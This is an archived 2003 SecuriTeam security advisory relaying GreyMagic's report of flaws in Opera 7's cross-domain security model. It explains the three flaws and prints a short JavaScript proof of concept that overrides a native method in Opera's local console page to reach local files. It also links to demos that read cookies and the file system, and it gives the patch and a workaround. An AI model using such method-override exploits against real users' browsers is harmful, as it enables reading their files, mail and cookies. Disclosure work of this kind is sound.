[NT] Opera's Security Model Vulnerable to Attack
From: support@securiteam.com
Date: 02/10/03
- Previous message: support@securiteam.com: "[NT] Phantom of the Opera (Opera Error Handling Executes Commands)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 10 Feb 2003 15:15:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Opera's Security Model Vulnerable to Attack
------------------------------------------------------------------------
SUMMARY
Opera recently released a new version of its browser.
Version 7 brings many long-awaited features such as proper DOM support and
an improved rendering engine. However, Opera seems to have neglected one
of the most important aspects in any browser today, its default
cross-domain security model.
A vulnerability was found in Opera's security model allowing execution of
arbitrary command (under elevated privileges) and elevating the privileges
of commands by inserting Trojans into native methods.
DETAILS
Vulnerable systems:
* Opera 7 on Windows operating system
Immune systems:
* Opera 7.01 on Windows operating system
All browsers with JavaScript support deploy a cross-domain security model,
which, in essence, attempts to prevent documents from one domain to access
other documents in different domains.
Opera 7 deployed a fundamentally different approach to cross-domain
security, a caller-based model, rather than the origin-based model
deployed in other browsers. The vulnerability is comprised of three
different flaws in that model:
* Functions in different domains can be accessed and executed.
* Functions are being executed under the caller's domain credentials and
not in their originating domain.
* It is possible to override properties and methods (both native and
user-defined) in other windows.
The first flaw means that a window in one domain is able to execute
functions in a window that is in a different domain. This flaw in itself
is not a big threat because of the second flaw, which means that even if a
function in the victim window is executed, it is executed with the
attacker's credentials, and therefore unable to access the victim's
document.
The second flaw means that if the attacker can get the victim to execute a
function, it will run under the victim's credentials. In addition, because
of the first flaw, the victim will have no problems accessing a malicious
function created by the attacker.
The third and most devastating flaw means that the attacker is able to
insert Trojans into native methods in the victim window with his own code
and simply wait for the victim to execute it.
With these three flaws combined, it becomes extremely easy to exploit any
document that uses some scripting, including local resources in the
file:// protocol. Being able to access local resources in Opera means that
the attacker would be able to:
* Read any file on the user's file system.
* Read the contents of directories on the user's file system.
* Read emails written or received by M2, Opera's mail program.
* And more...
Exploit:
A perfect candidate for exploitation is Opera's own JavaScript console,
which arrives in the form of three separate files in Opera's installation
directory.
The file "console.html" makes a very early call to the native method
"setInterval", which can be overridden by an attacking window. This
scenario does not require any user interaction.
< script language="jscript">
var oWin=open("file://localhost/console.html","","");
oWin.setInterval=function () {
alert("Access to local resource achieved:
"+oWin.document.location.href);
}
</script>
The "file://localhost/" URL appearing in this sample is a convenient
method provided by Opera in order to access the selected directory
(Opera's home by default).
Demonstration:
GreyMagic has put together two proof-of-concept demonstrations:
* <http://security.greymagic.com/adv/gm002-op/vmSimple.asp> Simple:
Reads cookies from a few well-known sites and demonstrates access to a
local resource.
* <http://security.greymagic.com/adv/gm002-op/vmExp.asp> GreyMagic Opera
Disk Explorer: Browse your entire file system using this explorer-like
tool, which takes advantage of this vulnerability in order to access local
resources.
Solution:
Opera was notified of a variation of this issue on 14-Nov-2002, but
apparently failed to understand the core issues and only patched one
symptom of the problem (it was possible for foreign windows to simply set
event handlers in Beta 1).
In the meantime, until a patch becomes available, disable JavaScript by
going to: File -> Preferences -> Multimedia, and uncheck the "Enable
JavaScript" item.
ADDITIONAL INFORMATION
The original advisory can be found at:
<http://security.greymagic.com/adv/gm002-op/>
http://security.greymagic.com/adv/gm002-op/
The information has been provided by <mailto:security@greymagic.com>
GreyMagic Software.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NT] Absolute Telnet Remote Buffer Overflow Vulnerability"
- Previous message: support@securiteam.com: "[NT] Phantom of the Opera (Opera Error Handling Executes Commands)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
